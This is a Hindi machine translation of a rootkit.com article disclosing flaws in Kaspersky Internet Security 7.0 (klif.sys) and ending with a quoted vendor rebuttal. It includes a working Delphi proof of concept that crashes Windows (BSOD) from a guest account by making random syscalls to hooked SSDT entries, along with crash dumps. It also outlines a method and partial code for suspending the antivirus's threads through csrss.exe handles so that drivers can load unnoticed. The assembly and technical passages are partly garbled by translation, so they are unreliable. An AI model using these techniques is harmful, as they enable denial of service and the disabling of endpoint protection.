Kaspersky पिछले दरवाजे 6/7

Rootkit.com के एक लेख का अनुवाद

प्रस्तावना

Kaspersky एंटी-वायरस आज तकनीकी रूप से सबसे उन्नत एंटी-वायरस में से एक है। यह कुछ प्रकार के रूटकिटों से भी लड़ सकता है , जब वे जीवित हैं और हमला करने की कोशिश कर रहे हैं।

इसमें एक प्रोएक्टिव डिफेंस मॉड्यूल है, जो एक आंशिक एचआईपीएस कार्यान्वयन है जो सिद्धांत रूप में, कार्यक्रमों के व्यवहार का विश्लेषण करके और अनधिकृत कार्यों को रोकने के लिए अज्ञात खतरों से कंप्यूटर की रक्षा कर सकता है।

यह सभी सिद्धांत और विज्ञापन नारे हैं। वास्तव में, हमारे पास एक पूरी तरह से अलग स्थिति है। कई रूटकिट्स हैं जो एंटीवायरस द्वारा बिल्कुल भी नहीं पहचाने जाते हैं, और इसकी सक्रिय रक्षा को इस तरह से दबाया जा सकता है कि हमलावर अपने चालक को लोड कर सकता है, जिसके बाद कोई भी प्रोएक्टिव रक्षा बस बेकार है।

यह आलेख केवल त्रुटियों और कमजोरियों का अवलोकन नहीं है - प्रत्येक भाग के अंत में हम एंटी-वायरस डेवलपर्स को सिफारिशें देते हैं, क्योंकि हम देखते हैं कि वे इन त्रुटियों से अपने आप निपट नहीं सकते हैं। और समर्थकों के लिए, तुरंत एक आरक्षण है: निश्चित रूप से, जो कुछ भी नीचे लिखा गया है, वह महत्वपूर्ण कमजोरियां नहीं है, नहीं, नहीं =) बीएसओडी को केएवी / केआईएस के साथ स्थापित करने के लिए केवल कुछ सरल तरीके हैं, यहां तक ​​कि एक अतिथि खाते से भी, बस केवीए / केआईएस वर्कअराउंड ... और इतने पर, सामान्य रूप से, दिल को बहुत अधिक न लें।

इस लेख में चर्चा की जाने वाली Kaspersky का संस्करण 7.0 है, अंतिम सार्वजनिक निर्माण 125 है, और उत्पाद प्रकार इंटरनेट सुरक्षा है।

Kaspersky और सिस्टम सर्विस डिस्क्रिप्टिव टेबल

एंटीवायरस के इस हिस्से को लंबे समय से सबसे कमजोर के रूप में जाना जाता है। यह ऐसा है क्योंकि इसमें कई प्राथमिक त्रुटियां हैं। ये त्रुटियां एक खराब लिखित सक्रिय रक्षा का एक और उदाहरण हैं।

Windows XP के तहत, Kaspersky एंटी-वायरस SSDT टेबल में सेवाएं जोड़ता है। कई सेवाएँ जो केवल Windows 2003 के अंतर्गत मौजूद हैं। उनकी संख्या 284 से 296 तक है। लगभग 13 अज्ञात प्रविष्टियाँ klif.sys के पते के साथ हैं।

यहाँ वे हैं:

ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BD80 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BD90 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BDA0 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BDC0 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BDE0 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BE10 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BE20 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BE40 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BE50 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BF10 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BFE0 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809C020 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809C060 हुक हैंडलर [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित है

यह क्या है यह पूरी तरह से समझ से बाहर है। हालाँकि, ऐसा लगता है कि KAV डेवलपर्स उन्हें Windows XP और 2003 के तहत SSDT तालिका में प्रविष्टियों की एक अलग संख्या के साथ समस्या को हल करने के लिए जोड़ रहे हैं। ऐसा क्यों किया गया यह तीसरा प्रश्न है।

और अब ध्यान दें: इनमें से किसी भी प्रविष्टि को हैक किया जा सकता है, इसके बाद बीएसओडी में एक सिस्टम क्रैश हो सकता है, यहां तक ​​कि न्यूनतम विशेषाधिकार वाले अतिथि खाते के तहत भी। हमने एक छोटा सा कार्यक्रम लिखा। यह SSDT में इन रहस्यमय प्रविष्टियों के लिए गलत मापदंडों के साथ गलत सिस्टम कॉल उत्पन्न करता है। कोड बहुत सरल लेकिन प्रभावी है। इसे शुद्ध विंडोज पर चलाने से कुछ भी नहीं होगा, क्योंकि विंडोज स्वयं ऐसी स्थितियों को सही ढंग से संभालता है।

var
Services: array[0..12] of ULONG;
ThreadTerminated: boolean = false;
ExecThread: THANDLE;

function MakeSysCall(SysCallNumber: integer; const Stack: PDWORD): DWORD; stdcall;
asm
mov eax, SysCallNumber
mov edx, Stack
int 2eh
mov Result,eax
end;

function exec(p1: pointer): DWORD; stdcall;
var
i: integer;
p2: DWORD;
p3: DWORD;
begin
randomize();
u := 0;
for i := 0 to 12 do Services[i] := 284 + i;
while not ThreadTerminated do
begin
p2 := random($FFFFFFFF);
p3 := Services[random(12)];
MakeSysCall(p3, @p2);
Sleep(100);
end;
CloseHandle(ExecThread);
ExecThread := 0;
result := 0;
end;

var
p2: DWORD;
begin
ThreadTerminated := false;
ExecThread := CreateThread(nil, 0, @exec, nil, 0, p2);
end;


निष्पादन परिणाम: Kaspersky Internet Security v7.0 125 बिल्ड

PAGE_FAULT_IN_NONPAGED_AREA (50)
अमान्य सिस्टम मेमोरी को संदर्भित किया गया था। इसे प्रयास को छोड़कर संरक्षित नहीं किया जा सकता है,
यह एक जांच द्वारा संरक्षित किया जाना चाहिए। आमतौर पर पता सिर्फ सादा खराब होता है या यह
मुक्त स्मृति की ओर इशारा कर रहा है।
तर्क:
Arg1: e0ae15f9, मेमोरी संदर्भित।
Arg2: 00000000, मान 0 = रीड ऑपरेशन, 1 = राइट ऑपरेशन।
Arg3: f8087e8c, यदि गैर-शून्य, अनुदेश पता जो खराब मेमोरी को संदर्भित करता है
पता।
Arg4: 00000000, (आरक्षित)

सभी bsod पाठ ...

लेकिन यह सब नहीं है!
SSDT में मौजूदा कमजोरियों की रिपोर्ट के बावजूद, Kaspersky Developers ने अभी तक उन्हें तय नहीं किया है!
हम इसे NTCALL नामक एक साधारण कार्यक्रम के साथ साबित कर सकते हैं। शुरू करने के बाद, यह गलत सिस्टम कॉल उत्पन्न करना शुरू कर देता है।

NtCreateSection - इस फ़ंक्शन को अमान्य मापदंडों के साथ कॉल करने से klif.sys में BSOD हो जाएगा।
यहाँ यह हमारा BSOD है:

KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
यह एक बहुत ही सामान्य बगचेक है। आमतौर पर अपवाद पता पिनपॉइंट्स
ड्राइवर / फ़ंक्शन जो समस्या का कारण बना। इस पते पर हमेशा ध्यान दें
साथ ही ड्राइवर / छवि की लिंक तिथि जिसमें यह पता है।
कुछ सामान्य समस्याएं अपवाद कोड 0x80000003 हैं। इसका मतलब है एक कठिन
कोडित ब्रेकपॉइंट या अभिकथन हिट किया गया था, लेकिन यह सिस्टम बूट किया गया था
/ NODEBUG यह ऐसा नहीं होना चाहिए जैसा कि डेवलपर्स के पास कभी नहीं होना चाहिए
खुदरा कोड में हार्डकोड टूट गया है, लेकिन ...
यदि ऐसा होता है, तो सुनिश्चित करें कि एक डिबगर जुड़ा हुआ है, और
सिस्टम बूट / DEBUG है। यह हमें देखने देगा कि यह विराम बिंदु क्यों है
हो रहा।
तर्क:
Arg1: c0000005, अपवाद कोड जो संभाला नहीं गया था
Arg2: 805883ea, अपवाद जो हुआ उस पते पर
Arg3: f669a95c, ट्रैप फ्रेम
Arg4: 00000000

डिबगिंग विवरण:
- विश्लेषण: अज्ञात आकार के साथ कर्नेल। ज्ञात आकार के साथ प्रतीकों को पुनः लोड करने के लिए बाध्य करेगा।
विश्लेषण: बल पुनः लोड कमान: .reload / f ntoskrnl.exe = FFFFFFFF804D7000,214600,41108004
***** कर्नेल प्रतीक गलत हैं। कृपया विश्लेषण करने के लिए प्रतीकों को ठीक करें।

MODULE_NAME: klif

सभी bsod पाठ ...

मैं क्या कह सकता हूं? .. यह समय एसएसडीटी के साथ रुकने और एसएसडीटी रिकॉर्ड के लिए सामान्य हैंडलर लिखने का है। बेहतर लें और ओलेग ज़ैतसेव से पूछें कि एसएसडीटी में हुक कैसे सेट करें?)

कास्परस्की और शैडो एसएसडीटी (शैडो एसएसडीटी)

छाया SSDT win32k.sys में एक विशेष तालिका है जिसमें उपयोगकर्ता ग्राफिक इंटरफ़ेस (GDI) के प्रदर्शन से संबंधित सिस्टम फ़ंक्शन के पते शामिल हैं। कैसपर्सकी ने कुछ सेवाओं के लिए यहां कीलोगर्स को रोकने और आत्मरक्षा के लिए हुक स्थापित किए हैं।

और फिर, हुक खराब तरीके से सेट किए गए हैं।

गलत मापदंडों के साथ NtUserSendInput और ... -> haha, नया BSOD, क्या यह आपको कुछ BSOD जनरेटर की याद नहीं दिलाता है? =)

PAGE_FAULT_IN_NONPAGED_AREA (50)
अमान्य सिस्टम मेमोरी को संदर्भित किया गया था। इसे प्रयास को छोड़कर संरक्षित नहीं किया जा सकता है,
यह एक जांच द्वारा संरक्षित किया जाना चाहिए। आमतौर पर पता सिर्फ सादा खराब होता है या यह
मुक्त स्मृति की ओर इशारा कर रहा है।
तर्क:
Arg1: e1f83004, मेमोरी संदर्भित।
Arg2: 00000000, मान 0 = रीड ऑपरेशन, 1 = राइट ऑपरेशन।
Arg3: f9417eee, यदि गैर-शून्य, अनुदेश पता जो खराब मेमोरी को संदर्भित करता है
पता।
Arg4: 00000001, (आरक्षित)

डिबगिंग विवरण:
- विश्लेषण: अज्ञात आकार के साथ कर्नेल। ज्ञात आकार के साथ प्रतीकों को पुनः लोड करने के लिए बाध्य करेगा।
विश्लेषण: बल पुनः लोड कमान: .reload / f ntoskrnl.exe = FFFFFFFF804D7000,214600,41108004
***** कर्नेल प्रतीक गलत हैं। कृपया विश्लेषण करने के लिए प्रतीकों को ठीक करें।

MODULE_NAME: klif
सभी bsod पाठ ...

इस भाग के लिए सिफारिशें सरल हैं - अपने ड्राइवर को डिबगर के नीचे चलाएं।

निम्नलिखित कोड

वर
पी 1: पीचर;
शुरू करना
p1: = पीचर ($ ffffffff);
LoadLibraryA (p1);
अंत;

Acces Violation की ओर जाता है और यह सामान्य है, क्योंकि हमने फ़ंक्शन के लिए एक गलत पैरामीटर का उपयोग किया है, लेकिन जो सामान्य नहीं है वह है जहां Acess Violation होता है, पते पर - 0xF80B3306।
यह कोई मजाक नहीं है - 0xF80B3306। कोर प्रक्रियाओं में! और अधिक सटीक होने के लिए - klif.sys में।

देखते हैं क्या होता है।

हमने सिस्टम में प्रत्येक प्रक्रिया के लिए IAT ( 1 , 2 ) का एक मजबूत संशोधन पाया। देखें कि explorer.exe के साथ क्या होता है

[420] explorer.exe -> kernel32.dll -> LoadLibraryExA, प्रकार: पते पर IAT संशोधन 0x010010A8 -> 7C882FB0 हुक हैंडलर जो [कर्नेल 32.dll] में स्थित है।
[420] explorer.exe -> kernel32.dll -> LoadLibraryExW, प्रकार: पते पर IAT संशोधन 0x010010F8 -> 7C882FD8 हुक हैंडलर जो [कर्नेल32.dll में स्थित है]
[420] explorer.exe -> kernel32.dll -> LoadLibraryA, प्रकार: पते पर IAT संशोधन 0x01001150 -> 7C882F9C हुक हैंडलर जो [कर्नेल32.dll] में स्थित है।
[420] explorer.exe -> kernel32.dll -> LoadLibraryW, प्रकार: पते पर IAT संशोधन 0x010011D0 -> 88C882FC4 हुक हैंडलर जो [कर्नेल ३२०० में स्थित है]
[420] explorer.exe -> kernel32.dll -> GetProcAddress, प्रकार: पते पर IAT संशोधन 0x010011E4 -> 7C882FEC हुक हैंडलर जो [कर्नेल 32.dll] में स्थित है।

अजीब है, है ना? चलो कॉल को LoadLibraryA पर ट्रैक करते हैं।

KERNEL32.LoadLibraryA:

धक्कामुक्की
मूव एबप, एस्प
nop
पॉप ईबे
jmp + $ 7b830b4a // - klif.sys पर पुनर्निर्देशित
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop

यह है कि क्या LoadLibraryA K कर्नेस्की एंटी-वायरस द्वारा IAT को पुनर्निर्देशित किए जाने के बाद कर्नेल 32.dll के अंदर दिखता है। क्या यह विकृति नहीं है?

यदि आप इस एंटीवायरस को अपने कंप्यूटर पर स्थापित करते हैं, तो आप (यह कैसी विडंबना है!) इसे अतिरिक्त कमजोरियों के लिए खोलें और Kaspersky एंटी-वायरस के लिए धन्यवाद बनाया! हँसी, और कुछ नहीं।

इस भाग में, हम अनुशंसा करते हैं कि कैसपर्सकी डेवलपर्स अपने उत्पाद से विकृतियों को हटा दें। सबसे पहले, कर्नेल प्रक्रियाओं के साथ संवाद करने के लिए बेहतर और सरल तरीके हैं, और दूसरी बात, यह सिर्फ एक विकृति है।

कैसपर्सकी एंटी-वायरस और आत्मरक्षा

जैसा कि आप में से अधिकांश जानते हैं, कैसपर्सकी एंटी-वायरस सक्रिय रूप से हमलों से बचाता है। इसकी प्रक्रियाएँ अनधिकृत पहुँच और दुर्भावनापूर्ण कार्यक्रमों द्वारा विनाश से सुरक्षित हैं। लेकिन सवाल यह है कि वे कितनी अच्छी तरह से संरक्षित हैं?

उत्तर: बीएडी।

Kaspersky SSDT (यानी NtOpenProcess, NtOpenThread, NtTerminateProcess, आदि) और शैडो SSDT (NtUserFindWowow, NtUserBuildHwndListList आदि) में कई हुक स्थापित करता है ताकि आगे के हमलों से खुद को बचाया जा सके।

अंत में, यह स्वयं को पुनरारंभ सेटिंग्स के साथ एक सेवा के रूप में स्थापित करता है जब कोई त्रुटि होती है। एसएसडीटी में कई हुक द्वारा सेवा सेटिंग्स को रजिस्ट्री में संरक्षित किया जाता है। तो हम इस एंटीवायरस को कैसे मार सकते हैं? और क्या हमें उसे मारने की जरूरत है? यदि हम avp.exe के दृश्य भाग को मारते हैं, तो इसे सेवा द्वारा फिर से शुरू किया जाएगा। यदि हम सेवा को मारते हैं, तो इसे सेवा नियंत्रण प्रबंधक (SCM) द्वारा लॉन्च किया जाएगा। तो हम इस एंटीवायरस को कैसे नष्ट कर सकते हैं (शैक्षिक उद्देश्यों के लिए, निश्चित रूप से)? सवाल अच्छा है।

उत्तर सरल है - ड्राइवर डाउनलोड करें, उसके बाद हम केएवी के हित के क्षेत्र से बाहर हो जाएंगे। लेकिन पहले, हमें इस अवसर को पाने के लिए इसे स्थगित करने की आवश्यकता है, है ना? वास्तव में नहीं। कम से कम तीन विधियां हैं जिनके द्वारा आप कैसपर्सकी प्रोएक्टिव डिफेंस 7.0 से थोड़ी सी प्रतिक्रिया के बिना ड्राइवर को चुपचाप डाउनलोड कर सकते हैं। और मुझे यकीन है कि अभी भी तरीके हैं। हमारे मामले में, हम बस कैसपर्सकी एंटी-वायरस प्रक्रियाओं के सभी थ्रेड्स को निलंबित कर देते हैं; बस रुकें, ज्यादा कुछ नहीं - बस इतना ही काफी है।

हम सीधे Kaspersky प्रक्रियाओं का उपयोग नहीं कर सकते, क्योंकि SSDT का मालिक PDM है । तो यह "पसंदीदा" पिछले दरवाजे प्रक्रिया का उपयोग करने का समय है जिसे csrss.exe कहा जाता है :)

इस उदाहरण में, हम एक प्राथमिकता मानते हैं कि KAV एप्लिकेशन का नाम avp.exe है और csrss.exe एक उदाहरण में मौजूद है (LOL, हाँ, यदि आपके पास रिंग 3 पर चलने वाला मैलवेयर है और csrss.exe के रूप में प्रच्छन्न है, तो इस कोड के साथ कुछ समस्याएं होंगी। )।

...
pBuffer.dwSize: = sizeof (PROCESSENTRY32W);
SnapShotHandle: = CreateToolHelp32SnapShot (TH32CS_SNAPPROCESS, 0);
...
अगर (ZwOpenProcess (@ph, PROCESS_ALL_ACCESS, @attr, @ cid1) <> STATUS_SUCCESS) तो बाहर निकलें;
...
ZwAllocateVirtualMemory (GetCurrentProcess (), buf , 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE);
ZwQuerySystemInformation (SystemHandleInformation, buf, 4194304, @bytesIO);
सभी कार्यक्रम पाठ ...

उसके बाद, दोनों निष्पादन योग्य कास्परस्की मॉड्यूल निलंबित हो जाएंगे और हम ड्राइवरों को लोड कर सकते हैं और अपना काम चुपचाप कर सकते हैं =)

KIS v7.0 का परीक्षण डिफ़ॉल्ट सेटिंग्स के साथ 125 का निर्माण करता है।
Windws XP SP2, व्यवस्थापक अधिकार।

हम अनुशंसा करते हैं कि उपयोगकर्ता खाता HANDLE_TABLE पर जाए और अपनी प्रक्रियाओं के संचालकों के लिए पहुँच अधिकार बदले। इसके अलावा यह NtDuplicateObject पर हुक को सुधारने का समय है।

उपसंहार

आप शायद खुद से पूछ रहे हैं कि इस तरह की स्पष्ट त्रुटियां - वास्तव में सबसे लोकप्रिय एंटीवायरस में से एक में अभी भी क्यों मौजूद हैं? हां, क्योंकि किसी को कैस्परस्की लैब के गधे के तहत एक अच्छी नौकरी देनी चाहिए।

बहुत पहले नहीं, हमने केएवी त्रुटियों की एक और समीक्षा प्रकाशित की। प्रतिक्रिया अपेक्षित थी। उन्होंने कहा, "चिंता मत करो, ये महत्वपूर्ण त्रुटियाँ नहीं हैं।" ठीक है, हाँ, शायद अतिथि खाते के तहत मौत की ब्लू स्क्रीन कंपनी के लिए इतनी बड़ी समस्या नहीं है। "सच में। सामान्य तौर पर बीएसओडी के लिए चे? बकवास, आराम करो लोग ":) लेकिन कुछ बदल रहा है - उन्होंने कई प्रकाशित कमजोरियों को बंद कर दिया, इसलिए हमें हमारे लिए थोड़ा धन्यवाद कहना चाहिए। इसके बजाय, हमें $ @% $ & # का एक गुच्छा मिलता है! आपके पते पर (अनौपचारिक रूप से, निश्चित रूप से)। खैर, हम सिर्फ इस तरह की प्रतिक्रिया के बारे में चिंता नहीं करते हैं, इसलिए अपने आप को (कट्टरपंथियों) लोगों को परेशान न करें। हम आत्म-प्रचार नहीं चाहते हैं और कैसपर्सकी से बेवकूफ बीएसओडी नहीं देखना चाहते हैं।

प्रिय कास्परस्की लैब डेवलपर्स, आपका एंटीवायरस बहुत अच्छा है, इसमें कोई संदेह नहीं है, लेकिन शायद इन बगों को ठीक करने का समय है? SSDT / IAT से विकृतियां दूर करें। अपने ड्राइवर में महत्वपूर्ण स्थितियों को अधिक सावधानी से संभालें। गंभीरता से नहीं, लेकिन क्या गलत है? Klif.sys को देखते हुए, मैं केवल एक चीज देखता हूं - एक बड़ा, छोटी गाड़ी चालक।

वैसे, किसी तरह से आप इस अद्भुत लेख में klif.sys की हमारी पिछली समीक्षा के लिए कास्परस्की लैब से अनौपचारिक प्रतिक्रिया पढ़ सकते हैं, जिसमें कुछ बेतुके बयान और अर्थहीन टिप्पणियां हैं। कुछ शब्दों में: इस लेख के लेखक ने आंशिक रूप से अपने पुराने और नए उत्पादों में कमजोरियों के बारे में जानकारी प्रकाशित करने का आरोप लगाया।

www.viruslist.ru/analysis?pubid=204007553

लेख रूसी में है, लेकिन मुझे यकीन है कि आप अंग्रेजी संस्करण पा सकते हैं।

मजा आ गया
VX आकाश से
EP_X0FF / UG उत्तर

rootkit.com


smartov: एक लेख के उद्धरण वे अंत में बात करते हैं

हाल के वर्षों में, निम्नलिखित स्थिति अत्यंत प्रासंगिक रही है। साइबर अपराधियों (या "सफेद टोपी के पीछे छिपने वाले") के वातावरण से कोई एक कोड अवधारणा विकसित कर रहा है जो सुरक्षा के आधुनिक साधनों को दरकिनार करता है, और प्रगति की देखभाल के रूप में प्रच्छन्न आत्म-पीआर के प्रयोजनों के लिए, इसे "अवांछनीय" के रूप में प्रकाशित करता है। हम जोर देते हैं: निश्चित रूप से, इस तरह की अवधारणा मौलिक रूप से undetectable नहीं है, लेकिन सुरक्षात्मक उपकरणों के ज्ञात कार्यों के एक या दो-चरण बाईपास के स्तर पर undetectable है। यदि सुरक्षा तंत्र ज्ञात हो तो इस तरह का वन-स्टेप बाईपास करना काफी सरल है।

इस तरह के प्रकाशन उपयोगकर्ताओं के एक निश्चित प्रतिशत का कारण बनते हैं जो मालवेयर और एंटीवायरस के ऑपरेटिंग सिद्धांतों से परिचित नहीं हैं, चिंता करने के लिए ("क्या मेरा एंटीवायरस उपकरण इस नए प्रकार के खतरे से बचाता है?")। ऐसी स्थिति में, सुरक्षात्मक उपकरणों के निर्माता केवल अपनी विश्वसनीयता को बहाल करने के लिए संसाधनों का हिस्सा फेंक सकते हैं: वर्णित अवधारणा को दरकिनार करने के लिए प्रौद्योगिकियों को विकसित करने के लिए, आमतौर पर अवधारणा के रूप में ही - एक-चरण। नतीजतन, प्राधिकरण को बहाल किया जाता है (लेकिन और कैसे?), सिस्टम "मैलवेयर - एंटीवायरस - उपयोगकर्ता" अपनी मूल स्थिति में आता है, और प्रक्रिया एक लूप में बंद हो जाती है। इसके प्रत्येक नए पुनरावृत्तियों में तेजी से परिष्कृत मैलवेयर और तेजी से भारी सुरक्षा उपकरण उत्पन्न होते हैं।

जैसा कि KVN में था: "महान योजना!"। इस तरह के असत्य स्वयं कमजोरियों को प्रकाशित करते हैं, और इस वजह से, खराब-विकट एंटीवायरस निर्माताओं को एक नया बेहतर उपयोगकर्ता इंटरफ़ेस विकसित करने और उन्हें ठीक करने के लिए एक गोभी के बाल कटवाने से दूर होना पड़ता है।

ps सबसे अधिक स्थापित KAV 7.0.0.125 ...